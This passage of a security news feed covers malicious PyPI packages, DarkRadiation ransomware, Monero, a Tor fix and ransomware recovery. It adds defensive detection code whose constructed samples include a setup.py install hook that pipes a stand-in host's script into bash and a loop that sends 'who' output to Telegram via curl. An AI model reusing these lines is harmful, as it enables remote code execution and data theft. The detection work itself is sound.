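        root = func
        while isinstance(root, ast.Attribute):  # urllib.request.urlopen -> urllib
            root = root.value
        if isinstance(root, ast.Name) and root.id in RISKY_MODULES:
            findings.append(f"line {node.lineno}: call into {root.id}")
        elif isinstance(func, ast.Name) and func.id in {"exec", "eval", "__import__"}:
            findings.append(f"line {node.lineno}: {func.id}() call")
        if isinstance(func, ast.Name) and func.id == "setup":
            if any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append(f"line {node.lineno}: cmdclass override (install hook)")
    return findings


# Constructed samples, not the real maratlib code. The first mirrors the
# pattern in the article: a custom install command that fetches a script.
MALICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        subprocess.call("curl -s http://example.invalid/x.sh | bash", shell=True)

setup(name="maratlib", version="0.1", cmdclass={"install": PostInstall})
'''

BENIGN_SETUP = '''
from setuptools import setup
setup(name="mylib", version="1.0", packages=["mylib"])
'''

if __name__ == "__main__":
    for pkg in ("maratlib", "matplatlib-plus", "mplatlib", "matplotlib"):
        print(pkg, typosquat_candidates(pkg, ["matplotlib", "numpy"], max_distance=3))
    print(suspicious_setup_py(MALICIOUS_SETUP))  # two findings
    print(suspicious_setup_py(BENIGN_SETUP))     # []
```

	<p>
		Note that an edit-distance check alone would not have caught “maratlib” (distance 4 from matplotlib, and nothing like the other names), so name screening has to be paired with a behavioural check such as the setup.py scan, or better still with a build that never runs setup.py from untrusted sources at all (for example, installing only from wheels with <code>pip install --only-binary :all:</code>).
	</p>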

	<p>
		 
	</p>

	<p>
		While analyzing the package, Sharma found that it attempted to download a Bash script (aza2.sh) from a GitHub repository that is no longer available.
	</p>

	<p>
		 
	</p>

	<p>
		Sharma tracked the author’s aliases on GitHub using open-source intelligence and found that the script’s role was to run a cryptominer called “Ubqminer” on the compromised machine.
	</p>

	<p>
		 
	</p>

	<p>
		<img alt="Ubqminer downloaded by bad PyPI package" data-ratio="50.83" src="https://www.bleepstatic.com/images/news/u/1100723/2021/PyPIUbqminer.jpg">
	</p>

	<p>
		 
	</p>

	<p>
		The researcher also notes that the malware author replaced the default Kryptex wallet address with their own to mine for <a href="https://coinmarketcap.com/currencies/ubiq/" rel="external nofollow">Ubiq cryptocurrency</a> (UBQ).
	</p>

	<p>
		 
	</p>

	<p>
		In another variant, the script included a different cryptomining program that uses GPU power, the <a href="https://github.com/trexminer/T-Rex" rel="external nofollow">open-source T-Rex</a>.
	</p>

	<p>
		 
	</p>

	<p>
		<img alt="PyPI package downloads T-Rex cryptomining program" data-ratio="46.25" src="https://www.bleepstatic.com/images/news/u/1100723/2021/PyPIT-Rex.jpg">
	</p>

	<p>
		 
	</p>

	<p>
		Attackers constantly target open-source package repositories such as PyPI [<a href="https://www.bleepingcomputer.com/news/security/spammers-flood-pypi-with-pirated-movie-links-and-bogus-packages/" target="_blank" rel="external nofollow">1</a>, <a href="https://www.bleepingcomputer.com/news/security/malicious-python-package-available-in-pypi-repo-for-a-year/" target="_blank" rel="external nofollow">2</a>, 3], npm for Node.js [<a href="https://www.bleepingcomputer.com/news/security/malicious-npm-packages-target-amazon-slack-with-new-dependency-attacks/" target="_blank" rel="external nofollow">1</a>, <a href="https://www.bleepingcomputer.com/news/security/malicious-npm-project-steals-discord-accounts-browser-info/" target="_blank" rel="external nofollow">2</a>, <a href="https://www.bleepingcomputer.com/news/security/npm-pulls-malicious-package-that-stole-login-passwords/" target="_blank" rel="external nofollow">3</a>], and <a href="https://www.bleepingcomputer.com/news/security/malicious-rubygems-packages-used-in-cryptocurrency-supply-chain-attack/" target="_blank" rel="external nofollow">RubyGems</a>. Even when detection comes while the download count is still low, as is typical, the risk is significant because developers may integrate the malicious code into widely used projects.
	</p>

	<p>
		 
	</p>

	<p>
		In this case, the six malicious packages were caught by Sonatype after scanning the PyPI repo with its automated malware detection system, Release Integrity. At detection time, the packages had accumulated almost 5,000 downloads since April, with “maratlib” recording the highest download count, 2,371.
	</p>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/malicious-pypi-packages-hijack-dev-devices-to-mine-cryptocurrency/" rel="external nofollow">Malicious PyPI packages hijack dev devices to mine cryptocurrency</a>
</p>
]]></description><guid isPermaLink="false">790</guid><pubDate>Tue, 22 Jun 2021 21:23:13 +0000</pubDate></item><item><title>Monero emerges as crypto of choice for cybercriminals</title><link>https://nsaneforums.com/news/security-privacy-news/monero-emerges-as-crypto-of-choice-for-cybercriminals-r789/</link><description><![CDATA[<header>
	<h1 itemprop="headline">
		Monero emerges as crypto of choice for cybercriminals
	</h1>

	<h2 itemprop="description">
		Untraceable "privacy coin" is rising in popularity among ransomware gangs.
	</h2>
</header>

<section>
	<div itemprop="articleBody">
		<p>
			 
		</p>

		<p>
			For cybercriminals looking to launder illicit gains, bitcoin has long been the payment method of choice. But another cryptocurrency is coming to the fore, promising to help make dirty money disappear without a trace.
		</p>

		<p>
			 
		</p>

		<p>
			While bitcoin leaves a visible trail of transactions on its underlying blockchain, the niche “privacy coin” monero was designed to obscure the sender and receiver, as well as the amount exchanged.
		</p>

		<p>
			 
		</p>

		<p>
			As a result, it has become an increasingly sought-after tool for criminals such as ransomware gangs, posing new problems for law enforcement.
		</p>

		<p>
			 
		</p>

		<p>
			The rise of monero comes as authorities race to crack down on cyber crime in the wake of a series of audacious attacks, notably the hack on the Colonial Pipeline, a major petroleum artery supplying the US east coast.
		</p>

		<p>
			 
		</p>

		<p>
			“We’ve seen ransomware groups specifically shifting to monero,” said Bryce Webster-Jacobsen, director of intelligence at GroupSense, a cyber security group that has helped a growing number of victims pay out ransoms in monero. “[Cyber criminals] have recognized the ability for mistakes to be made using bitcoin that allow blockchain transactions to reveal their identity.”
		</p>

		<p>
			 
		</p>

		<p>
			Russia-linked REvil, the notorious ransomware group believed to be behind the attack this month on meatpacker JBS, has removed the option of paying in bitcoin this year, demanding monero only, according to Brett Callow, threat analyst at Emsisoft.
		</p>

		<p>
			 
		</p>

		<p>
			Meanwhile, both DarkSide, the group blamed for the Colonial Pipeline hack, and Babuk, which was behind the attack on Washington DC police this year, allow payments in either cryptocurrency but charge a 10 to 20 percent premium to victims paying in riskier bitcoin, experts say.
		</p>

		<p>
			 
		</p>

		<p>
			Justin Ehrenhofer, a cryptocurrency compliance expert and member of the monero developer community, said that at the beginning of 2020, its use by ransomware gangs was “a rounding error.” Today he estimates that about 10 to 20 percent of ransoms are paid in monero and that the figure will probably rise to 50 percent by the end of the year.
		</p>

		<h2 id="fungible-money">
			Fungible money
		</h2>

		<p>
			Monero was launched as an open source project in 2014 by a user of a bitcoin forum with the pseudonym “thankful_for_today.” Its original white paper argued that bitcoin’s traceability was a “critical flaw,” adding that “privacy and anonymity are the most important aspects of electronic cash.”
		</p>

		<p>
			 
		</p>

		<p>
			Ehrenhofer is among those who argue that bitcoin’s visibility should be rejected in favor of a fully private financial system. “The main goal is transaction indistinguishability—to make private and fungible money,” he said. “We want to make monero as similar to cash as possible, where one $10 bill is the same as another and the merchant doesn’t know where they came from.”
		</p>

		<p>
			 
		</p>

		<p>
			While the currency has enjoyed a more than fivefold rise in price since the beginning of 2020, tracking the wider cryptocurrency rally, its overall market capitalization remains a sliver of that of bitcoin: nearly $5 billion compared with $727 billion, according to data from CoinMarketCap.
		</p>

		<p>
			 
		</p>

		<p>
			Still, it has inspired a loyal following among privacy idealists and anti-establishment cryptography hobbyists such as Ehrenhofer, who are dedicated to maintaining its code and using advanced mathematics to try to ensure its transactions remain untraceable. It now has the third-largest community of developers of any cryptocurrency, behind bitcoin and ethereum, data show.
		</p>

		<p>
			 
		</p>

		<p>
			But monero has also attracted controversy since its inception, thanks to its association with illicit payments and money laundering. Dr Tom Robinson, chief scientist and cofounder of blockchain intelligence group Elliptic, said an increasing number of marketplaces on the dark web exclusively accepted monero for sales of everything from guns to drugs. “That’s been a big shift over the past year.”
		</p>

		<p>
			 
		</p>

		<p>
			Meanwhile, ransomware negotiators, who are typically hired by victims to help handle extortion payments, have also begun contacting monero developers in order to understand how the cryptocurrency works, according to Ehrenhofer. The negotiators aimed to “build out the liquidity relationships” needed to facilitate payment in the event of a monero ransom demand, he said.
		</p>

		<h2 id="hidden-trails">
			Hidden trails
		</h2>

		<p>
			Monero's lack of a readable transaction trail is proving increasingly problematic for law enforcement, which typically works with private-sector cryptocurrency analytics firms to trace suspect transactions on bitcoin's public ledger.
		</p>

		<p>
			Europol, in a 2020 report, placed privacy coins among the factors that had “rendered cryptocurrency investigations more challenging and [that] we can expect these to feature more prominently in future investigations.”
		</p>

		<p>
			 
		</p>

		<p>
			In September last year, the US Internal Revenue Service offered a bounty of $625,000 for any contractors able to develop tools to help trace monero. The agency has since awarded the contract to cryptocurrency forensics group Chainalysis and data analysis group Integra FEC.
		</p>

		<p>
			 
		</p>

		<p>
			Other cryptocurrency forensics groups have also quietly been attempting to do the same. CipherTrace chief executive Dave Jevans said his company had started working on the currency more than two years ago under a contract with the US homeland security department and had filed patent applications as part of the work but would not share further details.
		</p>

		<p>
			 
		</p>

		<p>
			Some experts say it is unlikely that ransomware gangs will switch to demanding monero exclusively because difficulty in sourcing it could make victims less likely to pay up.
		</p>

		<p>
			 
		</p>

		<p>
			Many point to challenges around its liquidity and availability, meaning only smaller transactions may be possible. “If you pick a currency that’s too obscure, the very act of purchasing the currency can make [it] more expensive to purchase. That creates levels of unpredictability in a negotiation,” said Eric Friedberg, co-president of Aon-owned cyber security group Stroz Friedberg.
		</p>

		<p>
			 
		</p>

		<p>
			Others note that given the currency's opaqueness, it is impossible to ascertain whether or not your transactions are with sanctioned entities—which could risk severe penalties.
		</p>

		<p>
			 
		</p>

		<p>
			Multiple experts say US legislators are so far steering away from singling out any particular cryptocurrency when drafting relevant legislation. Still, many big cryptocurrency exchanges have shied away from listing privacy coins for fear of attracting regulatory scrutiny, as authorities increasingly insist on higher know-your-customer and money-laundering standards.
		</p>

		<p>
			 
		</p>

		<p>
			As a result, some ransomware negotiators remain nervous of any involvement with monero.
		</p>

		<p>
			 
		</p>

		<p>
			“If a client wants to do anything in a privacy coin, we don’t support it,” said Bill Siegel, chief executive of Coveware, one of the most popular ransom negotiator companies. “We understand what the attitude is from a regulatory standpoint and we want to be helpful to law enforcement.”
		</p>
	</div>
</section>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/information-technology/2021/06/monero-emerges-as-crypto-of-choice-for-cybercriminals/" rel="external nofollow">Monero emerges as crypto of choice for cybercriminals</a>
</p>
]]></description><guid isPermaLink="false">789</guid><pubDate>Tue, 22 Jun 2021 21:18:51 +0000</pubDate></item><item><title>Wormable DarkRadiation Ransomware Targets Linux and Docker Instances</title><link>https://nsaneforums.com/news/security-privacy-news/wormable-darkradiation-ransomware-targets-linux-and-docker-instances-r784/</link><description><![CDATA[<p>
	<span style="font-size:22px;"><strong>Wormable DarkRadiation Ransomware Targets Linux and Docker Instances</strong></span>
</p>

<p>
	 
</p>

<p>
	Cybersecurity researchers have disclosed a new ransomware strain called "DarkRadiation" that's implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control (C2) communications.
</p>

<p>
	 
</p>

<p>
	"The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions," researchers from Trend Micro said in a report published last week. "The malware uses OpenSSL's AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram's API to send an infection status to the threat actor(s)."
</p>

<p>
	 
</p>

<p>
	As of writing, there's no information available on the delivery methods or evidence that the ransomware has been deployed in real-world attacks.
</p>

<p>
	 
</p>

<p>
	The findings come from an analysis of a collection of hacking tools hosted on the unidentified threat actor's infrastructure (IP address "185.141.25.168") in a directory called "api_attack." The toolset was first noticed by Twitter user @r3dbU7z on May 28.
</p>

<p>
	 
</p>

<p>
	DarkRadiation's infection chain is multi-stage and is noteworthy for relying almost entirely on Bash scripts to retrieve the malware and encrypt files, and on the Telegram API, with hardcoded API keys, to communicate with the C2 server.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="ransomware-code.jpg" class="ipsImage" data-ratio="75.10" height="540" width="695" src="https://thehackernews.com/images/-9za-fhsFYNY/YNG0isAQmuI/AAAAAAAAC8k/vem-msIROSMghxr1YlKczQz4ifjhWk3RwCLcBGAsYHQ/s0/ransomware-code.jpg" />
</p>

<p style="text-align:center;">
	<span style="font-size:12px;"><em>Encryption Process</em></span>
</p>

<p style="text-align:center;">
	 
</p>

<p>
	Said to be under active development, the ransomware is obfuscated with the open-source tool "node-bash-obfuscate", which splits the Bash script into chunks, assigns each chunk to a variable, and replaces the original script with references to those variables.
</p>

<p>
	 
</p>

<p>
	Upon execution, DarkRadiation checks whether it is running as root and, if so, uses those privileges to install Wget, cURL, and OpenSSL. It then runs the "who" command every five seconds to snapshot the users currently logged in, and exfiltrates the results to an attacker-controlled endpoint through the Telegram API.
</p>

<p>
	 
</p>

<p>
	"If any of these are not available on the infected device, the malware attempts to download the required tools using YUM (Yellowdog Updater, Modified), a python-based package manager widely adopted by popular Linux distros such as RedHat and CentOS," SentinelOne researchers explained in a write-up published Monday.
</p>

<p>
	 
</p>

<p>
	In its final phase, the ransomware retrieves a list of all users on the compromised system, overwrites their passwords with "megapassword," and deletes all users with a login shell, but not before creating a new user "ferrum" with the password "MegPw0rD3", under which it proceeds with the encryption.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="code.jpg" class="ipsImage" data-ratio="75.10" height="540" width="561" src="https://thehackernews.com/images/-slY3PwQuT9M/YNG05LCMSUI/AAAAAAAAC8s/kyON61RF6kYv9aqnkw_UlhZEw_91Tz4agCLcBGAsYHQ/s0/code.jpg" />
</p>

<p style="text-align:center;">
	 
</p>

<p style="text-align:center;">
	<em><span style="font-size:12px;">Worm-like Spreading Functionality</span></em>
</p>

<p>
	<br />
	Interestingly, SentinelOne's analysis reveals variations: in some versions the password for the user "ferrum" is downloaded from the attacker's C2 server, while in others it is hardcoded as a string such as "$MeGaPass123#", implying that the malware is changing rapidly ahead of actual deployment.
</p>

<p>
	 
</p>

<p>
	"It must be noted that the ransomware appends radioactive symbols ('.☢') as a file extension for an encrypted file," Trend Micro threat researcher Aliakbar Zahravi said.
</p>

<p>
	 
</p>

<p>
	A second component of the attack is an SSH worm that takes its credential configuration as a base64-encoded parameter, uses those credentials to connect to the target over SSH, and then downloads and executes the ransomware.
</p>

<p>
	 
</p>

<p>
	DarkRadiation reports its execution status, together with the encryption key, to the adversary's Telegram channel through the API; it can also stop and disable all running Docker containers on the infected machine, after which a ransom note is displayed to the user.
</p>
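<p>
	As an added example (not code from Trend Micro or SentinelOne, and not the ransomware's own script), the sweep below turns the indicators described above into host checks: the "ferrum" account in /etc/passwd, a mass password reset visible in the "last changed" field of /etc/shadow, files carrying the ".☢" extension, and process command lines that poll <code>who</code> with a five-second sleep or beacon to the Telegram Bot API (api.telegram.org is the Bot API's public host; the token in a bot URL is the hardcoded key the article mentions). All inputs at the bottom are constructed samples with placeholder hashes, token and paths.
</p>

```python
"""Host IOC sweep for the DarkRadiation behaviours described above.

Added example for this page, not code from Trend Micro or SentinelOne.
It works on plain text so it runs offline over the constructed samples at
the bottom; on a live host feed it /etc/passwd, /etc/shadow, a file
listing and the output of `ps -eo args`.
"""
import re

RADIOACTIVE = "\u2622"  # the '.☢' extension appended to encrypted files
# Telegram Bot API URL; the bot token (hardcoded in the malware) sits in the path.
TELEGRAM_RE = re.compile(r"https?://api\.telegram\.org/bot[^/\s]+/\w+")


def sweep_passwd(passwd_text):
    """Flag the 'ferrum' account the ransomware creates, plus any extra UID 0."""
    findings = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) < 7:
            continue
        user, uid = parts[0], parts[2]
        if user == "ferrum":
            findings.append("passwd: account 'ferrum' present (DarkRadiation IOC)")
        if uid == "0" and user != "root":
            findings.append(f"passwd: extra UID 0 account '{user}'")
    return findings


def sweep_shadow(shadow_text, min_accounts=3):
    """Mass password reset: the malware overwrites every user's password, so
    many accounts with a real hash end up sharing one 'last changed' day
    (field 3, days since the epoch). Locked/empty entries ('!', '*') are skipped."""
    by_day = {}
    for line in shadow_text.splitlines():
        parts = line.split(":")
        if len(parts) < 3 or not parts[1].startswith("$"):
            continue
        by_day.setdefault(parts[2], []).append(parts[0])
    return [f"shadow: {len(u)} accounts changed password on day {d}: {', '.join(u)}"
            for d, u in by_day.items() if len(u) >= min_accounts]


def sweep_files(paths):
    """Flag files carrying the radioactive-sign extension."""
    return [f"file: {p} carries the .{RADIOACTIVE} extension"
            for p in paths if p.endswith("." + RADIOACTIVE)]


def sweep_processes(cmdlines):
    """Flag the Telegram beacon and the 'who' loop with a 5-second sleep."""
    findings = []
    for c in cmdlines:
        if TELEGRAM_RE.search(c):
            findings.append(f"proc: Telegram Bot API beacon: {c[:70]}")
        if re.search(r"\bwho\b", c) and re.search(r"\bsleep\s+5\b", c):
            findings.append(f"proc: 'who' polling loop: {c[:70]}")
    return findings


def sweep(passwd_text, shadow_text, paths, cmdlines):
    return (sweep_passwd(passwd_text) + sweep_shadow(shadow_text)
            + sweep_files(paths) + sweep_processes(cmdlines))


# Constructed samples (hashes, token and paths are placeholders).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
ferrum:x:1001:1001::/home/ferrum:/bin/bash
"""
SAMPLE_SHADOW = """root:$6$aaaa:18800:0:99999:7:::
alice:$6$bbbb:18800:0:99999:7:::
bob:$6$cccc:18800:0:99999:7:::
ferrum:$6$dddd:18800:0:99999:7:::
daemon:*:18000:0:99999:7:::
"""
SAMPLE_FILES = ["/home/alice/report.pdf." + RADIOACTIVE,
                "/home/alice/notes.txt",
                "/var/lib/docker/overlay2/data.db." + RADIOACTIVE]
SAMPLE_PROCS = [
    "bash -c 'while true; do who > /tmp/u; curl -s "
    "https://api.telegram.org/bot123456:AAAA/sendMessage -d chat_id=1 "
    "-d text=@/tmp/u; sleep 5; done'",
    "/usr/sbin/sshd -D",
]

if __name__ == "__main__":
    for finding in sweep(SAMPLE_PASSWD, SAMPLE_SHADOW, SAMPLE_FILES, SAMPLE_PROCS):
        print(finding)
```

<p>
	The shadow check is the least specific of the four (an administrator's bulk password reset looks the same), so treat it as corroborating evidence rather than a trigger on its own; the ferrum account, the extension and the Telegram beacon are specific to this family as described.
</p>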

<p>
	 
</p>

<p>
	"Malware written in shell script languages allows attackers to be more versatile and to avoid some common detection methods," SentinelOne researchers said.
</p>

<p>
	 
</p>

<p>
	"As scripts do not need to be recompiled, they can be iterated upon more rapidly. Moreover, since some security software relies on static file signatures, these can easily be evaded through rapid iteration and the use of simple obfuscator tools to generate completely different script files."
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2021/06/wormable-darkradiation-ransomware.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">784</guid><pubDate>Tue, 22 Jun 2021 13:05:51 +0000</pubDate></item><item><title>Tor Browser fixes vulnerability that tracks you using installed apps</title><link>https://nsaneforums.com/news/security-privacy-news/tor-browser-fixes-vulnerability-that-tracks-you-using-installed-apps-r778/</link><description><![CDATA[<h1>
	Tor Browser fixes vulnerability that tracks you using installed apps
</h1>

<div>
	<p>
		 
	</p>

	<p>
		The Tor Project has released Tor Browser 10.0.18 to fix numerous bugs, including a vulnerability that allows sites to track users by fingerprinting the applications installed on their devices.
	</p>

	<p>
		 
	</p>

	<p>
		In May, JavaScript fingerprinting firm FingerprintJS <a href="https://www.bleepingcomputer.com/news/security/cross-browser-tracking-vulnerability-tracks-you-via-installed-apps/" target="_blank" rel="external nofollow">disclosed a 'scheme flooding' vulnerability</a> that allows the tracking of users across different browsers based on the applications installed on their device.
	</p>

	<p>
		 
	</p>

	<p>
		To build a tracking profile, a site attempts to open various application URL handlers, such as zoommtg://, and checks whether the browser shows a launch prompt, like the one for Zoom below.
	</p>

	<div>
		<figure>
			<img alt="Zoom URL Handler" data-ratio="47.78" src="https://www.bleepstatic.com/images/news/politics/cross-browser-tracking-url-scheme/url-scheme-prompt.jpg">
			<figcaption>
				Zoom URL Handler
			</figcaption>
		</figure>
	</div>

	<p>
		If the application's prompt is displayed, the application can be assumed to be installed. By probing many URL handlers, a site can derive an ID from the unique combination of apps installed on the user's device.
	</p>

	<p>
		 
	</p>

	<p>
		This ID can then be tracked across different browsers, including Google Chrome, Edge, Tor Browser, Firefox, and Safari.
	</p>

	<p>
		 
	</p>

	<p>
		This vulnerability is especially concerning for Tor users who use the browser to protect their identity and IP address from being logged with sites. As this vulnerability tracks users across browsers, it could allow web sites, and even law enforcement, to track a user's real IP address when they switch to a non-anonymizing browser, such as Google Chrome.
	</p>

	<p>
		 
	</p>

	<p>
		With the release of Tor Browser 10.0.18, the Tor Project has introduced a fix for this vulnerability by setting the 'network.protocol-handler.external' setting to false.
	</p>

	<p>
		 
	</p>

	<p>
		This default setting will prevent the browser from passing the handling of a particular URL to an external application and thus no longer trigger the application prompts.
	</p>

	<h2>
		Full changelog
	</h2>

	<p>
		The full changelog for Tor Browser 10.0.18 is:
	</p>

	<p>
		 
	</p>

	<ul>
		<li>
			All Platforms
			<ul>
				<li>
					Update Tor to 0.4.5.9
				</li>
			</ul>
		</li>
		<li>
			Android
			<ul>
				<li>
					Update Fenix to 89.1.1
				</li>
				<li>
					Update NoScript to 11.2.8
				</li>
				<li>
					<a href="https://bugs.torproject.org/tpo/applications/android-components/40055" rel="external nofollow">Bug 40055</a>: Rebase android-components patches on 75.0.22 for Fenix 89
				</li>
				<li>
					<a href="https://bugs.torproject.org/tpo/applications/fenix/40165" rel="external nofollow">Bug 40165</a>: Announce v2 onion service deprecation on about:tor
				</li>
				<li>
					<a href="https://bugs.torproject.org/tpo/applications/fenix/40166" rel="external nofollow">Bug 40166</a>: Hide "Normal" tab (again) and Sync tab in TabTray
				</li>
				<li>
					<a href="https://bugs.torproject.org/tpo/applications/fenix/40167" rel="external nofollow">Bug 40167</a>: Hide "Save to Collection" in menu
				</li>
				<li>
					<a href="https://bugs.torproject.org/tpo/applications/fenix/40169" rel="external nofollow">Bug 40169</a>: Rebase fenix patches to fenix v89.1.1
				</li>
				<li>
					<a href="https://bugs.torproject.org/tpo/applications/fenix/40170" rel="external nofollow">Bug 40170</a>: Error building tor-browser-89.1.1-10.5-1
				</li>
				<li>
					<a href="https://bugs.torproject.org/tpo/applications/tor-browser/40432" rel="external nofollow">Bug 40432</a>: Prevent probing installed applications
				</li>
				<li>
					<a href="https://bugs.torproject.org/tpo/applications/tor-browser/40470" rel="external nofollow">Bug 40470</a>: Rebase 10.0 patches onto 89.0
				</li>
			</ul>
		</li>
		<li>
			Build System
			<ul>
				<li>
					Android
					<ul>
						<li>
							<a href="https://bugs.torproject.org/tpo/applications/tor-browser-build/40290" rel="external nofollow">Bug 40290</a>: Update components for mozilla89-based Fenix
						</li>
					</ul>
				</li>
			</ul>
		</li>
	</ul>

	<p>
		 
	</p>

	<p>
		You can upgrade to Tor Browser 10.0.18 by opening the menu, going to Help, and selecting About Tor Browser, which will automatically check for and install any new updates.
	</p>

	<p>
		 
	</p>

	<p>
		You can also download the latest browser from the <a href="https://www.torproject.org/download/" rel="external nofollow" target="_blank">Tor Browser download page</a> and the <a href="https://dist.torproject.org/torbrowser/10.0.18/" rel="external nofollow" target="_blank">distribution directory</a>.
	</p>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/tor-browser-fixes-vulnerability-that-tracks-you-using-installed-apps/" rel="external nofollow">Tor Browser fixes vulnerability that tracks you using installed apps</a>
</p>

<p>
	 
</p>

<p>
	Frontpaged: <a href="https://nsaneforums.com/topic/413341-tor-browser-10018" rel="">Tor Browser 10.0.18</a>
</p>
]]></description><guid isPermaLink="false">778</guid><pubDate>Tue, 22 Jun 2021 04:16:39 +0000</pubDate></item><item><title>5 Critical Steps to Recover From a Ransomware Attack</title><link>https://nsaneforums.com/news/security-privacy-news/5-critical-steps-to-recover-from-a-ransomware-attack-r777/</link><description><![CDATA[<p>
	<span style="font-size:28px;"><strong>5 Critical Steps to Recover From a Ransomware Attack</strong></span>
</p>

<p>
	 
</p>

<p>
	Hackers are increasingly using ransomware as an effective tool to disrupt businesses and fund malicious activities.
</p>

<p>
	 
</p>

<p>
	A recent analysis by cybersecurity company Group-IB found that ransomware attacks doubled in 2020, while Cybersecurity Ventures predicts that a ransomware attack will occur every 11 seconds in 2021.
</p>

<p>
	 
</p>

<p>
	Businesses must prepare for the possibility of a ransomware attack affecting their data, services, and business continuity. What steps are involved in recovering from a ransomware attack?
</p>

<p>
	 
</p>

<ul>
	<li>
		Isolate and shutdown critical systems
	</li>
	<li>
		Enact your business continuity plan
	</li>
	<li>
		Report the cyberattack
	</li>
	<li>
		Restore from backup
	</li>
	<li>
		Remediate, patch, and monitor
	</li>
</ul>

<p>
	 
</p>

<p>
	<strong>Isolate and shutdown critical systems</strong>
</p>

<p>
	 
</p>

<p>
	The first important step is to isolate and shut down business-critical systems. The ransomware may not yet have reached all accessible data and systems; shutting down and isolating both infected and healthy systems helps contain the malicious code.
</p>

<p>
	 
</p>

<p>
	From the first evidence of ransomware on the network, containment should be a priority. Containment and isolation can include isolating systems from a network perspective or powering them down altogether.
</p>

<p>
	 
</p>

<p>
	<strong>Enact your business continuity plan</strong>
</p>

<p>
	<br />
	The business continuity plan and its disaster recovery component are essential to maintaining some level of business operations.
</p>

<p>
	 
</p>

<p>
	The business continuity plan is a step-by-step playbook that helps all departments understand how the business operates in times of disaster or other business-altering scenarios. The disaster recovery component details how critical data and systems can be restored and brought back online.
</p>

<p>
	 
</p>

<p>
	<strong>Report the cyberattack</strong>
</p>

<p>
	<br />
	Many businesses may hesitate to do so, but reporting the attack to customers, stakeholders, and law enforcement is essential. Law enforcement agencies can provide access to resources that may not be available otherwise.
</p>

<p>
	 
</p>

<p>
	You will also need to consider compliance regulations. The GDPR, for example, gives businesses a 72-hour window to notify the supervisory authority of a data breach involving personal data.
</p>

<p>
	 
</p>

<p>
	<strong>Restore from backup</strong>
</p>

<p>
	<br />
	The best protective measure for your data is backups. However, restoring large quantities of data is time-consuming and can keep the business offline for an extended period.
</p>

<p>
	 
</p>

<p>
	This situation highlights the need to discover and contain ransomware infections as quickly as possible to reduce the amount of data that needs recovering.
</p>

<p>
	 
</p>

<p>
	<strong>Remediate, patch, and monitor</strong>
</p>

<p>
	<br />
	In the final phase of recovering from a ransomware attack, companies remediate the ransomware infection, patch systems that may have led to the initial ransomware compromise, and monitor the environment closely for further malicious activity.
</p>

<p>
	 
</p>

<p>
	It is not unheard of for malicious activity to continue, even if the ransom is paid, or if infected systems were restored. If the same vulnerability exists that led to the initial attack, the environment can become compromised once again.
</p>

<p>
	 
</p>

<p>
	<strong>Remediate common entry points for ransomware</strong>
</p>

<p>
	<br />
	As businesses look to bolster the environment against ransomware and other malicious threats, it is crucial to look at the common entry points for these types of attacks.
</p>

<p>
	 
</p>

<p>
	Attackers use phishing to harvest credentials, which can then be used to launch a ransomware attack or to access systems directly.
</p>

<p>
	 
</p>

<p>
	<strong>Prevention and next steps</strong>
</p>

<p>
	<br />
	Businesses must not be careless in handling password security, especially with Active Directory user accounts.
</p>

<p>
	 
</p>

<p>
	Unfortunately, Active Directory does not have good native security tools for securing passwords in line with today's password security policy requirements.
</p>

<p>
	 
</p>

<p>
	Specops Password Policy provides breached password protection, disallowed password lists, and many other robust security features to protect your environment. It takes the very basic password policies available in Active Directory and aligns them with modern guidance from NIST and other cybersecurity authorities.
</p>

<p>
	 
</p>

<p>
	Learn more about Specops Password Policy and download a free trial to protect your environment from vulnerable passwords.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2021/06/5-critical-steps-to-recovering-from.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">777</guid><pubDate>Mon, 21 Jun 2021 23:02:25 +0000</pubDate></item><item><title>Google Chrome on iOS is getting an enhanced privacy feature</title><link>https://nsaneforums.com/news/security-privacy-news/google-chrome-on-ios-is-getting-an-enhanced-privacy-feature-r769/</link><description><![CDATA[<h1>
	Google Chrome on iOS is getting an enhanced privacy feature
</h1>

<div>
	<p>
		 
	</p>

	<p>
		Google Chrome for iOS now allows you to lock your incognito tabs behind Face ID so other people can't snoop on what sites you are visiting.
	</p>

	<p>
		 
	</p>

	<p>
		Google Chrome's Incognito mode is commonly used to visit sensitive sites that people do not want recorded in the browser history or in saved cookies.
	</p>

	<p>
		 
	</p>

	<p>
		If a user leaves their phone unlocked, nothing prevents another person from viewing what tabs are currently open in Incognito mode.
	</p>

	<p>
		 
	</p>

	<p>
		Google Chrome for iOS now includes an additional experimental privacy feature that allows you to lock Incognito mode behind your iPhone's Face ID authentication feature so that only you can access the open tabs.
	</p>

	<p>
		 
	</p>

	<p>
		Once enabled, when attempting to open the secured Incognito tabs in Chrome for iOS, the browser will prompt the person to authenticate using Face ID, as shown below.
	</p>

	<div>
		<figure>
			<img alt="Chrome Incognito tabs locked behind Face ID" data-ratio="194.55" style="width: 275px; height: auto;" width="275" src="https://www.bleepstatic.com/images/news/web-browsers/chrome/incognito-faceid-lock/locked-incognito-mode.jpg">
			<figcaption>
				Chrome Incognito tabs locked behind Face ID
			</figcaption>
		</figure>
	</div>

	<p>
		Once Incognito mode has been unlocked with Face ID, you will not have to unlock it again until you close and open the browser again.
	</p>

	<p>
		 
	</p>

	<p>
		As Google is still testing this feature, you have to enable it via the chrome://flags page using the following steps:
	</p>

	<p>
		 
	</p>

	<ol>
		<li>
			Open Chrome and enter chrome://flags in the address bar, and press Go on the virtual keyboard.
		</li>
		<li>
